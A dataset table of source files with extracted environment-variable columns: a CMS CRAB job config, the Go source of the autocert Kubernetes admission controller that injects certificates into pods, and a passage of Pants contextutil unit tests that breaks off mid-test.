filename (string, 4–198 chars) | content (string, 25–939k chars) | environment (sequence) | variablearg (sequence) | constarg (sequence) | variableargjson (string, 1 class) | constargjson (string, 2–3.9k chars) | lang (string, 3 classes) | constargcount (float64, 0–129 or ⌀) | variableargcount (float64, 0–0 or ⌀) | sentence (string, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
Kai/crab/NANOv7_Fri13/2017/MuMu/crab_cfg_2017_MuMu_E.py | import os
from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import getUsernameFromCRIC
config = Configuration()
config.section_("General")
config.General.requestName = '2017_MuMu_E'
config.General.transferOutputs = True
config.General.transferLogs = True
config.section_("JobType")
config.JobType.allowUndistributedCMSSW = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'PSet.py'
config.JobType.maxMemoryMB = 2000
config.JobType.maxJobRuntimeMin = 1315
config.JobType.numCores = 1
config.JobType.scriptExe = 'crab_script_2017_MuMu_E.sh'
config.JobType.inputFiles = ['crab_script_2017_MuMu_E.py',
os.path.join(os.environ['CMSSW_BASE'],'src/PhysicsTools/NanoAODTools/scripts/haddnano.py'),
]
config.JobType.outputFiles = ['hist.root']
config.JobType.sendPythonFolder = True
config.section_("Data")
config.Data.inputDataset = '/DoubleMuon/Run2017E-02Apr2020-v1/NANOAOD'
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
if config.Data.splitting == 'FileBased':
config.Data.unitsPerJob = 1
# config.Data.totalUnits = $TOTAL_UNITS
# config.Data.userInputFiles = []
config.Data.outLFNDirBase = '/store/user/{user}/Fri13'.format(user=getUsernameFromCRIC())
config.Data.publication = True
config.Data.outputDatasetTag = 'Fri13'
config.section_("Site")
config.Site.storageSite = 'T2_CH_CERN'
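# Submission sketch (assuming a standard CMSSW + CRAB3 environment; hypothetical
# invocation using this file's own name):
#   crab submit -c crab_cfg_2017_MuMu_E.py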
| [] | [] | ["CMSSW_BASE"] | [] | ["CMSSW_BASE"] | python | 1 | 0 | |
controller/main.go | package main
import (
"bytes"
"context"
"crypto/sha256"
"encoding/base64"
"encoding/hex"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
"time"
"github.com/ghodss/yaml"
"github.com/pkg/errors"
log "github.com/sirupsen/logrus"
"github.com/smallstep/certificates/ca"
"github.com/smallstep/certificates/pki"
"github.com/smallstep/cli/utils"
"go.step.sm/crypto/pemutil"
v1 "k8s.io/api/admission/v1"
authv1 "k8s.io/api/authentication/v1"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/serializer"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
)
var (
runtimeScheme = runtime.NewScheme()
codecs = serializer.NewCodecFactory(runtimeScheme)
deserializer = codecs.UniversalDeserializer()
)
const (
rootOnlyKey = "autocert.step.sm/root-only"
admissionWebhookAnnotationKey = "autocert.step.sm/name"
admissionWebhookStatusKey = "autocert.step.sm/status"
durationWebhookStatusKey = "autocert.step.sm/duration"
firstAnnotationKey = "autocert.step.sm/init-first"
bootstrapperOnlyAnnotationKey = "autocert.step.sm/bootstrapper-only"
sansAnnotationKey = "autocert.step.sm/sans"
volumeMountPath = "/var/run/autocert.step.sm"
)
// Config options for the autocert admission controller.
type Config struct {
Address string `yaml:"address"`
Service string `yaml:"service"`
LogFormat string `yaml:"logFormat"`
CaURL string `yaml:"caUrl"`
CertLifetime string `yaml:"certLifetime"`
Bootstrapper corev1.Container `yaml:"bootstrapper"`
Renewer corev1.Container `yaml:"renewer"`
CertsVolume corev1.Volume `yaml:"certsVolume"`
SATokenVolume corev1.Volume `yaml:"saTokenVolume"`
RestrictCertificatesToNamespace bool `yaml:"restrictCertificatesToNamespace"`
ClusterDomain string `yaml:"clusterDomain"`
InternalDomain string `yaml:"internalDomain"`
RootCAPath string `yaml:"rootCAPath"`
ProvisionerPasswordPath string `yaml:"provisionerPasswordPath"`
}
// GetAddress returns the address set in the configuration, defaults to ":4443"
// if it's not specified.
func (c Config) GetAddress() string {
if c.Address != "" {
return c.Address
}
return ":4443"
}
// GetServiceName returns the service name set in the configuration, defaults to
// "autocert" if it's not specified.
func (c Config) GetServiceName() string {
if c.Service != "" {
return c.Service
}
return "autocert"
}
// GetClusterDomain returns the Kubernetes cluster domain, defaults to
// "cluster.local" if not specified in the configuration.
func (c Config) GetClusterDomain() string {
if c.ClusterDomain != "" {
return c.ClusterDomain
}
return "cluster.local"
}
// GetRootCAPath returns the root CA path in the configuration, defaults to
// "STEPPATH/certs/root_ca.crt" if it's not specified.
func (c Config) GetRootCAPath() string {
if c.RootCAPath != "" {
return c.RootCAPath
}
return pki.GetRootCAPath()
}
// GetProvisionerPasswordPath returns the path to the provisioner password,
// defaults to "/home/step/password/password" if not specified in the
// configuration.
func (c Config) GetProvisionerPasswordPath() string {
if c.ProvisionerPasswordPath != "" {
return c.ProvisionerPasswordPath
}
return "/home/step/password/password"
}
// PatchOperation represents an RFC 6902 JSON Patch operation.
type PatchOperation struct {
Op string `json:"op"`
Path string `json:"path"`
Value interface{} `json:"value,omitempty"`
}
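// A single serialized operation looks like, e.g. (illustrative values):
//   {"op":"add","path":"/metadata/annotations","value":{"autocert.step.sm/status":"injected"}}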
// RFC 6901 JSON Pointer escaping -- https://tools.ietf.org/html/rfc6901
func escapeJSONPath(path string) string {
// Replace `~` with `~0`, then `/` with `~1`. The order matters:
// doing it the other way around would turn a `/` into `~01`.
path = strings.Replace(path, "~", "~0", -1)
path = strings.Replace(path, "/", "~1", -1)
return path
}
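// For example, escapeJSONPath("autocert.step.sm/name") returns
// "autocert.step.sm~1name", so the annotation key occupies a single JSON
// Pointer segment: "/metadata/annotations/autocert.step.sm~1name".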
func loadConfig(file string) (*Config, error) {
data, err := ioutil.ReadFile(file)
if err != nil {
return nil, err
}
var cfg Config
if err := yaml.Unmarshal(data, &cfg); err != nil {
return nil, err
}
return &cfg, nil
}
// mkBootstrapper generates a bootstrap container based on the template defined in Config. It
// computes the CA fingerprint and exposes it, along with the CA URL, certificate name and
// duration, and pod metadata, as environment variables in the returned bootstrap container.
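// The fingerprint is the lowercase hex-encoded SHA-256 of the root CA's DER bytes,
// matching what `step certificate fingerprint root_ca.crt` prints (assuming the
// smallstep CLI; mentioned here only for orientation).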
func mkBootstrapper(config *Config, podName string, rootOnly bool, commonName, duration, namespace string) (corev1.Container, error) {
b := config.Bootstrapper
// Generate CA fingerprint
crt, err := pemutil.ReadCertificate(config.GetRootCAPath())
if err != nil {
return b, errors.Wrap(err, "CA fingerprint")
}
sum := sha256.Sum256(crt.Raw)
fingerprint := strings.ToLower(hex.EncodeToString(sum[:]))
if rootOnly {
b.Env = append(b.Env, corev1.EnvVar{
Name: "ROOT_ONLY",
Value: "true",
})
}
b.Env = append(b.Env, corev1.EnvVar{
Name: "COMMON_NAME",
Value: commonName,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "DURATION",
Value: duration,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "STEP_CA_URL",
Value: config.CaURL,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "STEP_FINGERPRINT",
Value: fingerprint,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "STEP_NOT_AFTER",
Value: config.CertLifetime,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "POD_NAME",
Value: podName,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "NAMESPACE",
Value: namespace,
})
b.Env = append(b.Env, corev1.EnvVar{
Name: "CLUSTER_DOMAIN",
Value: config.ClusterDomain,
})
b.TTY = true
return b, nil
}
// mkRenewer generates a new renewer based on the template provided in Config.
func mkRenewer(config *Config, podName, commonName, namespace string) corev1.Container {
r := config.Renewer
r.Env = append(r.Env, corev1.EnvVar{
Name: "STEP_CA_URL",
Value: config.CaURL,
})
r.Env = append(r.Env, corev1.EnvVar{
Name: "COMMON_NAME",
Value: commonName,
})
r.Env = append(r.Env, corev1.EnvVar{
Name: "POD_NAME",
Value: podName,
})
r.Env = append(r.Env, corev1.EnvVar{
Name: "NAMESPACE",
Value: namespace,
})
r.Env = append(r.Env, corev1.EnvVar{
Name: "CLUSTER_DOMAIN",
Value: config.ClusterDomain,
})
return r
}
func removeInitContainers() (ops PatchOperation) {
return PatchOperation{
Op: "remove",
Path: "/spec/initContainers",
}
}
func addContainers(existing, new []corev1.Container, path string) (ops []PatchOperation) {
if len(existing) == 0 {
return []PatchOperation{
{
Op: "add",
Path: path,
Value: new,
},
}
}
for _, add := range new {
ops = append(ops, PatchOperation{
Op: "add",
Path: path + "/-",
Value: add,
})
}
return ops
}
func addVolumes(existing, new []corev1.Volume, path string) (ops []PatchOperation) {
if len(existing) == 0 {
return []PatchOperation{
{
Op: "add",
Path: path,
Value: new,
},
}
}
for _, add := range new {
ops = append(ops, PatchOperation{
Op: "add",
Path: path + "/-",
Value: add,
})
}
return ops
}
func addCertsVolumeMount(volumeName string, containers []corev1.Container, containerType string, first bool) (ops []PatchOperation) {
volumeMount := corev1.VolumeMount{
Name: volumeName,
MountPath: volumeMountPath,
ReadOnly: true,
}
add := 0
if first {
add = 1
}
for i, container := range containers {
if len(container.VolumeMounts) == 0 {
ops = append(ops, PatchOperation{
Op: "add",
Path: fmt.Sprintf("/spec/%s/%v/volumeMounts", containerType, i+add),
Value: []corev1.VolumeMount{volumeMount},
})
} else {
ops = append(ops, PatchOperation{
Op: "add",
Path: fmt.Sprintf("/spec/%s/%v/volumeMounts/-", containerType, i+add),
Value: volumeMount,
})
}
}
return ops
}
func addAnnotations(existing, new map[string]string) (ops []PatchOperation) {
if len(existing) == 0 {
return []PatchOperation{
{
Op: "add",
Path: "/metadata/annotations",
Value: new,
},
}
}
for k, v := range new {
if existing[k] == "" {
ops = append(ops, PatchOperation{
Op: "add",
Path: "/metadata/annotations/" + escapeJSONPath(k),
Value: v,
})
} else {
ops = append(ops, PatchOperation{
Op: "replace",
Path: "/metadata/annotations/" + escapeJSONPath(k),
Value: v,
})
}
}
return ops
}
// patch produces a list of patches to apply to a pod to inject a certificate. In particular,
// we patch the pod in order to:
// - Mount the `certs` volume in existing containers and initContainers defined in the pod
// - Add the autocert-renewer as a container (a sidecar)
// - Add the autocert-bootstrapper as an initContainer
// - Add the `certs` volume definition
// - Annotate the pod to indicate that it's been processed by this controller
// The result is a list of serialized JSONPatch objects (or an error).
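// A truncated result might look like (illustrative):
//   [{"op":"add","path":"/spec/initContainers","value":[...]},
//    {"op":"add","path":"/metadata/annotations/autocert.step.sm~1status","value":"injected"}]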
func patch(pod *corev1.Pod, namespace string, config *Config) ([]byte, error) {
var ops []PatchOperation
name := pod.ObjectMeta.GetName()
if name == "" {
name = pod.ObjectMeta.GetGenerateName()
}
annotations := pod.ObjectMeta.GetAnnotations()
rootOnly := annotations[rootOnlyKey] == "true"
commonName := annotations[admissionWebhookAnnotationKey]
first := strings.EqualFold(annotations[firstAnnotationKey], "true")
bootstrapperOnly := strings.EqualFold(annotations[bootstrapperOnlyAnnotationKey], "true")
duration := annotations[durationWebhookStatusKey]
renewer := mkRenewer(config, name, commonName, namespace)
bootstrapper, err := mkBootstrapper(config, name, rootOnly, commonName, duration, namespace)
if err != nil {
return nil, err
}
if first {
if len(pod.Spec.InitContainers) > 0 {
ops = append(ops, removeInitContainers())
}
initContainers := append([]corev1.Container{bootstrapper}, pod.Spec.InitContainers...)
ops = append(ops, addContainers([]corev1.Container{}, initContainers, "/spec/initContainers")...)
} else {
ops = append(ops, addContainers(pod.Spec.InitContainers, []corev1.Container{bootstrapper}, "/spec/initContainers")...)
}
ops = append(ops, addCertsVolumeMount(config.CertsVolume.Name, pod.Spec.Containers, "containers", false)...)
ops = append(ops, addCertsVolumeMount(config.CertsVolume.Name, pod.Spec.InitContainers, "initContainers", first)...)
if !rootOnly && !bootstrapperOnly {
ops = append(ops, addContainers(pod.Spec.Containers, []corev1.Container{renewer}, "/spec/containers")...)
}
ops = append(ops, addVolumes(pod.Spec.Volumes, []corev1.Volume{config.CertsVolume}, "/spec/volumes")...)
ops = append(ops, addVolumes(pod.Spec.Volumes, []corev1.Volume{config.SATokenVolume}, "/spec/volumes")...)
ops = append(ops, addAnnotations(pod.Annotations, map[string]string{admissionWebhookStatusKey: "injected"})...)
return json.Marshal(ops)
}
// shouldMutate checks whether a pod is subject to mutation by this admission controller. A pod
// is subject to mutation if it's annotated with the `admissionWebhookAnnotationKey` and if it
// has not already been processed (indicated by `admissionWebhookStatusKey` set to `injected`).
// If the pod requests a certificate with a subject matching a namespace other than its own
// and restrictToNamespace is true, then shouldMutate will return a validation error
// that should be returned to the client.
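// For example (hypothetical values): with namespace "frontend", cluster domain
// "cluster.local", and restriction enabled, the subject "web.frontend.svc" is
// permitted, while "web.backend.svc" or "web.backend.svc.cluster.local" is rejected.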
func shouldMutate(metadata *metav1.ObjectMeta, namespace string, clusterDomain string, restrictToNamespace bool) (bool, error) {
annotations := metadata.GetAnnotations()
if annotations == nil {
annotations = map[string]string{}
}
// Only mutate if the object is annotated appropriately (annotation key set) and we haven't
// mutated already (status key isn't set).
if annotations[admissionWebhookStatusKey] == "injected" {
return false, nil
}
if annotations[rootOnlyKey] == "true" {
return true, nil
}
if annotations[admissionWebhookAnnotationKey] == "" {
return false, nil
}
if !restrictToNamespace {
return true, nil
}
subject := strings.Trim(annotations[admissionWebhookAnnotationKey], ".")
err := fmt.Errorf("subject \"%s\" matches a namespace other than \"%s\" and is not permitted. This check can be disabled by setting restrictCertificatesToNamespace to false in the autocert-config ConfigMap", subject, namespace)
if strings.HasSuffix(subject, ".svc") && !strings.HasSuffix(subject, fmt.Sprintf(".%s.svc", namespace)) {
return false, err
}
if strings.HasSuffix(subject, fmt.Sprintf(".svc.%s", clusterDomain)) && !strings.HasSuffix(subject, fmt.Sprintf(".%s.svc.%s", namespace, clusterDomain)) {
return false, err
}
return true, nil
}
// mutate takes an `AdmissionReview`, determines whether it is subject to mutation, and returns
// an appropriate `AdmissionResponse` including patches or any errors that occurred.
func mutate(review *v1.AdmissionReview, config *Config) *v1.AdmissionResponse {
ctxLog := log.WithField("uid", review.Request.UID)
request := review.Request
var pod corev1.Pod
if err := json.Unmarshal(request.Object.Raw, &pod); err != nil {
ctxLog.WithField("error", err).Error("Error unmarshaling pod")
return &v1.AdmissionResponse{
Allowed: false,
UID: request.UID,
Result: &metav1.Status{
Message: err.Error(),
},
}
}
ctxLog = ctxLog.WithFields(log.Fields{
"kind": request.Kind,
"operation": request.Operation,
"name": pod.Name,
"generateName": pod.GenerateName,
"namespace": request.Namespace,
"user": request.UserInfo,
})
mutationAllowed, validationErr := shouldMutate(&pod.ObjectMeta, request.Namespace, config.GetClusterDomain(), config.RestrictCertificatesToNamespace)
if validationErr != nil {
ctxLog.WithField("error", validationErr).Info("Validation error")
return &v1.AdmissionResponse{
Allowed: false,
UID: request.UID,
Result: &metav1.Status{
Message: validationErr.Error(),
},
}
}
if !mutationAllowed {
ctxLog.WithField("annotations", pod.Annotations).Info("Skipping mutation")
return &v1.AdmissionResponse{
Allowed: true,
UID: request.UID,
}
}
patchBytes, err := patch(&pod, request.Namespace, config)
if err != nil {
ctxLog.WithField("error", err).Error("Error generating patch")
return &v1.AdmissionResponse{
Allowed: false,
UID: request.UID,
Result: &metav1.Status{
Message: err.Error(),
},
}
}
ctxLog.WithField("patch", string(patchBytes)).Info("Generated patch")
return &v1.AdmissionResponse{
Allowed: true,
Patch: patchBytes,
UID: request.UID,
PatchType: func() *v1.PatchType {
pt := v1.PatchTypeJSONPatch
return &pt
}(),
}
}
func main() {
if len(os.Args) != 2 {
log.Errorf("Usage: %s <config>\n", os.Args[0])
os.Exit(1)
}
config, err := loadConfig(os.Args[1])
if err != nil {
panic(err)
}
log.SetOutput(os.Stdout)
if config.LogFormat == "json" {
log.SetFormatter(&log.JSONFormatter{})
}
if config.LogFormat == "text" {
log.SetFormatter(&log.TextFormatter{})
}
log.WithFields(log.Fields{
"config": config,
}).Info("Loaded config")
provisionerName := os.Getenv("PROVISIONER_NAME")
provisionerKid := os.Getenv("PROVISIONER_KID")
log.WithFields(log.Fields{
"provisionerName": provisionerName,
"provisionerKid": provisionerKid,
}).Info("Loaded provisioner configuration")
password, err := utils.ReadPasswordFromFile(config.GetProvisionerPasswordPath())
if err != nil {
panic(err)
}
provisioner, err := ca.NewProvisioner(
provisionerName, provisionerKid, config.CaURL, password,
ca.WithRootFile(config.GetRootCAPath()))
if err != nil {
log.Errorf("Error loading provisioner: %v", err)
os.Exit(1)
}
log.WithFields(log.Fields{
"name": provisioner.Name(),
"kid": provisioner.Kid(),
}).Info("Loaded provisioner")
namespace := os.Getenv("NAMESPACE")
if namespace == "" {
log.Errorf("$NAMESPACE not set")
os.Exit(1)
}
name := fmt.Sprintf("%s.%s.svc", config.GetServiceName(), namespace)
token, err := provisioner.Token(name)
if err != nil {
log.WithField("error", err).Errorf("Error generating bootstrap token during controller startup")
os.Exit(1)
}
log.WithField("name", name).Infof("Generated bootstrap token for controller")
// make sure to cancel the renew goroutine
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
srv, err := ca.BootstrapServer(ctx, token, &http.Server{
Addr: config.GetAddress(),
Handler: http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if r.URL.Path == "/healthz" {
log.Debug("/healthz")
w.WriteHeader(http.StatusOK)
fmt.Fprintln(w, "ok")
return
}
if r.URL.Path == "/token" {
log.Debug("/token")
token, status, err := handleTokenRequest(ctx, provisioner, r, config)
if err != nil {
log.WithError(err).Error("error occurred while processing token request")
w.WriteHeader(status)
return
}
w.WriteHeader(http.StatusOK)
fmt.Fprintln(w, token)
return
}
if r.URL.Path != "/mutate" {
log.WithField("path", r.URL.Path).Error("Bad Request: 404 Not Found")
http.NotFound(w, r)
return
}
var body []byte
if r.Body != nil {
if data, err := ioutil.ReadAll(r.Body); err == nil {
body = data
}
}
if len(body) == 0 {
log.Error("Bad Request: 400 (Empty Body)")
http.Error(w, "Bad Request (Empty Body)", http.StatusBadRequest)
return
}
contentType := r.Header.Get("Content-Type")
if contentType != "application/json" {
log.WithField("Content-Type", contentType).Error("Bad Request: 415 (Unsupported Media Type)")
http.Error(w, fmt.Sprintf("Bad Request: 415 Unsupported Media Type (Expected Content-Type 'application/json' but got '%s')", contentType), http.StatusUnsupportedMediaType)
return
}
var response *v1.AdmissionResponse
review := v1.AdmissionReview{
TypeMeta: metav1.TypeMeta{
APIVersion: v1.SchemeGroupVersion.String(),
Kind: "AdmissionReview",
},
}
if _, _, err := deserializer.Decode(body, nil, &review); err != nil {
log.WithFields(log.Fields{
"body": body,
"error": err,
}).Error("Can't decode body")
response = &v1.AdmissionResponse{
Allowed: false,
Result: &metav1.Status{
Message: err.Error(),
},
}
} else {
response = mutate(&review, config)
}
resp, err := json.Marshal(v1.AdmissionReview{
TypeMeta: metav1.TypeMeta{
APIVersion: v1.SchemeGroupVersion.String(),
Kind: "AdmissionReview",
},
Response: response,
})
if err != nil {
log.WithFields(log.Fields{
"uid": review.Request.UID,
"error": err,
}).Info("Marshal error")
http.Error(w, fmt.Sprintf("Marshal Error: %v", err), http.StatusInternalServerError)
} else {
log.WithFields(log.Fields{
"uid": review.Request.UID,
"response": string(resp),
}).Info("Returning review")
if _, err := w.Write(resp); err != nil {
log.WithFields(log.Fields{
"uid": review.Request.UID,
"error": err,
}).Info("Write error")
}
}
}),
}, ca.VerifyClientCertIfGiven())
if err != nil {
panic(err)
}
log.Info("Listening on", config.GetAddress(), "...")
if err := srv.ListenAndServeTLS("", ""); err != nil {
panic(err)
}
}
// handleTokenRequest authorizes the request by sending a TokenReview with the service account
// token to the apiserver, then generates a bootstrap token that includes the pod IP among the
// SANs and returns it to the bootstrapper.
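// A bootstrapper would call this endpoint roughly like (hypothetical sketch):
//   curl -H "Authorization: Bearer $SA_TOKEN" https://autocert.<namespace>.svc:4443/token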
func handleTokenRequest(ctx context.Context, provisioner *ca.Provisioner, r *http.Request, config *Config) (string, int, error) {
var token string
authHeader := r.Header.Get("Authorization")
if authHeader == "" {
return token, http.StatusUnauthorized, errors.New("missing authorization header")
}
// TODO: Make this a bit more robust, parsing-wise
authHeaderParts := strings.Fields(authHeader)
if len(authHeaderParts) != 2 || strings.ToLower(authHeaderParts[0]) != "bearer" {
return token, http.StatusBadRequest, errors.New("Authorization header format must be Bearer {token}")
}
saToken := authHeaderParts[1]
c, err := getK8sClient()
if err != nil {
return token, http.StatusInternalServerError, err
}
review := authv1.TokenReview{Spec: authv1.TokenReviewSpec{
Token: saToken,
Audiences: []string{"autocert"},
}}
resp, err := c.AuthenticationV1().TokenReviews().Create(ctx, &review, metav1.CreateOptions{})
if err != nil {
return token, http.StatusInternalServerError, err
}
if !resp.Status.Authenticated {
return token, http.StatusUnauthorized, errors.New("invalid sa token")
}
saTokenParsed, err := parseSAToken(saToken)
if err != nil {
return token, http.StatusInternalServerError, err
}
token, err = generateToken(provisioner, saTokenParsed.K8s.Namespace, saTokenParsed.K8s.Pod.Name, config.ClusterDomain, config.InternalDomain)
if err != nil {
return token, http.StatusInternalServerError, err
}
return token, http.StatusOK, nil
}
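// parseSAToken decodes the payload (second segment) of the service account JWT without
// verifying its signature; authenticity was already checked via the TokenReview above.
// A projected token's payload carries, among other claims (illustrative excerpt):
//   {"kubernetes.io":{"namespace":"default","pod":{"name":"my-pod-7d4b9"}}}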
func parseSAToken(saTokenString string) (saToken, error) {
token := saToken{}
parts := strings.Split(saTokenString, ".")
if len(parts) < 2 {
return token, errors.New("malformed service account token")
}
seg := parts[1]
if l := len(seg) % 4; l > 0 {
seg += strings.Repeat("=", 4-l)
}
segment, err := base64.URLEncoding.DecodeString(seg)
if err != nil {
return token, err
}
decoder := json.NewDecoder(bytes.NewBuffer(segment))
err = decoder.Decode(&token)
if err != nil {
return token, err
}
return token, nil
}
type saToken struct {
K8s struct {
Namespace string `json:"namespace,omitempty"`
Pod struct {
Name string `json:"name,omitempty"`
} `json:"pod,omitempty"`
} `json:"kubernetes.io,omitempty"`
}
func generateToken(provisioner *ca.Provisioner, ns string, podName string, domain string, internalDomain string) (string, error) {
c, err := getK8sClient()
if err != nil {
return "", err
}
var pod *corev1.Pod
var counter int
timeout, cancelFunc := context.WithTimeout(context.Background(), 10*time.Second)
err = wait.PollImmediateUntil(2*time.Second, func() (done bool, err error) {
log.WithField("counter", counter).Info("fetching pod IP")
counter++
var e error
pod, e = c.CoreV1().Pods(ns).Get(timeout, podName, metav1.GetOptions{})
if e != nil {
log.WithError(e).Error("failed to fetch pod IP")
return false, nil
}
return pod.Status.PodIP != "", nil
}, timeout.Done())
cancelFunc()
if err != nil {
return "", err
}
annotations := pod.ObjectMeta.GetAnnotations()
commonName := annotations[admissionWebhookAnnotationKey]
splitCommonNameFn := func(c rune) bool {
return c == '.'
}
segments := strings.FieldsFunc(commonName, splitCommonNameFn)
if len(segments) == 0 {
return "", errors.Errorf("invalid common name: %s", commonName)
}
svcName := segments[0]
timeout, cancelFunc = context.WithTimeout(context.Background(), 10*time.Second)
service, err := c.CoreV1().Services(ns).Get(timeout, svcName, metav1.GetOptions{})
cancelFunc()
if err != nil {
return "", err
}
svcSans := []string{svcName,
fmt.Sprintf("%s.%s", svcName, ns),
fmt.Sprintf("%s.%s.svc", svcName, ns),
fmt.Sprintf("%s.%s.svc.%s", svcName, ns, domain),
service.Spec.ClusterIP}
if service.Spec.Type == corev1.ServiceTypeLoadBalancer {
ing := service.Status.LoadBalancer.Ingress
if len(ing) == 0 {
log.Warnf("external IP address of the LB service [%s] not available, skipping", svcName)
} else {
svcSans = append(svcSans, ing[0].IP)
}
if internalDomain != "" {
svcSans = append(svcSans, fmt.Sprintf("%s.%s", svcName, internalDomain))
}
}
splitFn := func(c rune) bool {
return c == ','
}
sans := strings.FieldsFunc(annotations[sansAnnotationKey], splitFn)
if len(sans) == 0 {
sans = []string{commonName}
}
sans = append(sans, svcSans...)
sans = append(sans, pod.Status.PodIP, "localhost", "127.0.0.1")
log.Info("sans:", sans)
token, err := provisioner.Token(commonName, sans...)
if err != nil {
return "", errors.Wrap(err, "failed to generate token")
}
return token, nil
}
func getK8sClient() (*kubernetes.Clientset, error) {
kc, err := rest.InClusterConfig()
if err != nil {
return nil, err
}
kubeClient, err := kubernetes.NewForConfig(kc)
if err != nil {
return nil, err
}
return kubeClient, nil
}
| ["\"PROVISIONER_NAME\"", "\"PROVISIONER_KID\"", "\"NAMESPACE\""] | [] | ["PROVISIONER_KID", "PROVISIONER_NAME", "NAMESPACE"] | [] | ["PROVISIONER_KID", "PROVISIONER_NAME", "NAMESPACE"] | go | 3 | 0 | |
tests/python/pants_test/util/test_contextutil.py | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
import pstats
import shutil
import signal
import subprocess
import sys
import unittest
import unittest.mock
import uuid
import zipfile
from contextlib import contextmanager
from typing import Iterator
from pants.util.contextutil import (
InvalidZipPath,
Timer,
environment_as,
exception_logging,
hermetic_environment_as,
maybe_profiled,
open_zip,
pushd,
signal_handler_as,
stdio_as,
temporary_dir,
temporary_file,
)
PATCH_OPTS = dict(autospec=True, spec_set=True)
class ContextutilTest(unittest.TestCase):
@contextmanager
def ensure_user_defined_in_environment(self) -> Iterator[None]:
"""Utility to test for hermetic environments."""
original_env = os.environ.copy()
if "USER" not in original_env:
os.environ["USER"] = "pantsbuild"
try:
yield
finally:
os.environ.clear()
os.environ.update(original_env)
def test_empty_environment(self) -> None:
with environment_as():
pass
def test_override_single_variable(self) -> None:
with temporary_file(binary_mode=False) as output:
# test that the override takes place
with environment_as(HORK='BORK'):
subprocess.Popen([sys.executable, '-c', 'import os; print(os.environ["HORK"])'],
stdout=output).wait()
output.seek(0)
self.assertEqual('BORK\n', output.read())
# test that the variable is cleared
with temporary_file(binary_mode=False) as new_output:
subprocess.Popen([sys.executable, '-c', 'import os; print("HORK" in os.environ)'],
stdout=new_output).wait()
new_output.seek(0)
self.assertEqual('False\n', new_output.read())
def test_environment_negation(self) -> None:
with temporary_file(binary_mode=False) as output:
with environment_as(HORK='BORK'):
with environment_as(HORK=None):
# test that the variable is cleared
subprocess.Popen([sys.executable, '-c', 'import os; print("HORK" in os.environ)'],
stdout=output).wait()
output.seek(0)
self.assertEqual('False\n', output.read())
def test_hermetic_environment(self) -> None:
with self.ensure_user_defined_in_environment():
with hermetic_environment_as():
self.assertNotIn('USER', os.environ)
def test_hermetic_environment_subprocesses(self) -> None:
with self.ensure_user_defined_in_environment():
with hermetic_environment_as(AAA='333'):
output = subprocess.check_output('env', shell=True).decode()
self.assertNotIn('USER=', output)
self.assertIn('AAA', os.environ)
self.assertEqual(os.environ['AAA'], '333')
self.assertIn('USER', os.environ)
self.assertNotIn('AAA', os.environ)
def test_hermetic_environment_unicode(self) -> None:
with environment_as(XXX='¡'):
self.assertEqual(os.environ['XXX'], '¡')
with hermetic_environment_as(AAA='¡'):
self.assertIn('AAA', os.environ)
self.assertEqual(os.environ['AAA'], '¡')
self.assertEqual(os.environ['XXX'], '¡')
def test_simple_pushd(self) -> None:
pre_cwd = os.getcwd()
with temporary_dir() as tempdir:
with pushd(tempdir) as path:
self.assertEqual(tempdir, path)
self.assertEqual(os.path.realpath(tempdir), os.getcwd())
self.assertEqual(pre_cwd, os.getcwd())
self.assertEqual(pre_cwd, os.getcwd())
def test_nested_pushd(self) -> None:
pre_cwd = os.getcwd()
with temporary_dir() as tempdir1:
with pushd(tempdir1):
self.assertEqual(os.path.realpath(tempdir1), os.getcwd())
with temporary_dir(root_dir=tempdir1) as tempdir2:
with pushd(tempdir2):
self.assertEqual(os.path.realpath(tempdir2), os.getcwd())
self.assertEqual(os.path.realpath(tempdir1), os.getcwd())
self.assertEqual(os.path.realpath(tempdir1), os.getcwd())
self.assertEqual(pre_cwd, os.getcwd())
self.assertEqual(pre_cwd, os.getcwd())
def test_temporary_file_no_args(self) -> None:
with temporary_file() as fp:
self.assertTrue(os.path.exists(fp.name), 'Temporary file should exist within the context.')
self.assertFalse(os.path.exists(fp.name),
'Temporary file should not exist outside of the context.')
def test_temporary_file_without_cleanup(self) -> None:
with temporary_file(cleanup=False) as fp:
self.assertTrue(os.path.exists(fp.name), 'Temporary file should exist within the context.')
self.assertTrue(os.path.exists(fp.name),
'Temporary file should exist outside of context if cleanup=False.')
os.unlink(fp.name)
def test_temporary_file_within_other_dir(self) -> None:
with temporary_dir() as path:
with temporary_file(root_dir=path) as f:
self.assertTrue(os.path.realpath(f.name).startswith(os.path.realpath(path)),
'file should be created in root_dir if specified.')
def test_temporary_dir_no_args(self) -> None:
with temporary_dir() as path:
self.assertTrue(os.path.exists(path), 'Temporary dir should exist within the context.')
self.assertTrue(os.path.isdir(path), 'Temporary dir should be a dir and not a file.')
self.assertFalse(os.path.exists(path), 'Temporary dir should not exist outside of the context.')
def test_temporary_dir_without_cleanup(self) -> None:
with temporary_dir(cleanup=False) as path:
self.assertTrue(os.path.exists(path), 'Temporary dir should exist within the context.')
self.assertTrue(os.path.exists(path),
'Temporary dir should exist outside of context if cleanup=False.')
shutil.rmtree(path)
def test_temporary_dir_with_root_dir(self) -> None:
with temporary_dir() as path1:
with temporary_dir(root_dir=path1) as path2:
self.assertTrue(os.path.realpath(path2).startswith(os.path.realpath(path1)),
'Nested temporary dir should be created within outer dir.')
def test_timer(self) -> None:
class FakeClock:
def __init__(self):
self._time = 0.0
def time(self) -> float:
ret: float = self._time
self._time += 0.0001 # Force a little time to elapse.
return ret
def sleep(self, duration: float) -> None:
self._time += duration
clock = FakeClock()
# Note: to test with the real system clock, use this instead:
